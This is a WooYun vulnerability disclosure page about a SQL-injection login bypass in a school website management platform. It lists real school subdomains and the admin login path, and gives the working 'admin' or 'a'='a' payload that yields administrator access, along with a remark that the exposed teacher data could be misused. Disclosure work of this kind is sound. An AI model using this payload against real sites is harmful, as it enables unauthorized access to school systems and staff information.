当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-088928
漏洞标题:
某数字化校园管理平台存在万能密码
相关厂商:
亿禾工场
漏洞作者:
Keith
提交时间:
2014-12-30 14:53
修复时间:
2015-02-13 14:54
公开时间:
2015-02-13 14:54
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-12-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

初来乌云,求邀请码、
貌似这个问题影响到不少学校网站

详细说明:

jxehe.com为嘉兴亿禾工场的网站,貌似负责了该地区大部分的中小学学校网站,仅该域名下就寄有大量嘉善中小学校网站,通过关键词site:*.jxehe.com搜集,得部分学校如下:

浙江广播电视大学嘉善学院	jsdd.jxehe.com
浙江省嘉善县车站路小学		szxx.jxehe.com
嘉善县泗洲小学			szxx.jxehe.com
嘉善县天凝中学			tnzx.jxehe.com
嘉善县干窑小学			gyxx.jxehe.com
嘉善县姚庄小学			jsyzxx.jxehe.com
浙江省嘉善县丁栅中心学校	dzzx.jxehe.com
嘉善县实验中学			jssyzx.jxehe.com
嘉兴市科技馆			jxkjg.jxehe.com
嘉善实验小学			jssyxx.jxehe.com


另外通过百度关键词“designed by 亿禾工场”,可得到更多案例
以szxx.jxehe.com为例,进行渗透测试:
打开jxkjg.jxehe.com/manage/default.htm
利用万能账号:admin' or 'a'='a
密码:1
成功登陆后台,有管理员权限。

1.png


2.png


3.png


在后台得到更多教师信息,可用于登陆校讯通,发送短信之类

4.png


5.png


6.png


漏洞证明:

如上

修复方案:

过滤吧、、

版权声明:转载请注明来源 Keith@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝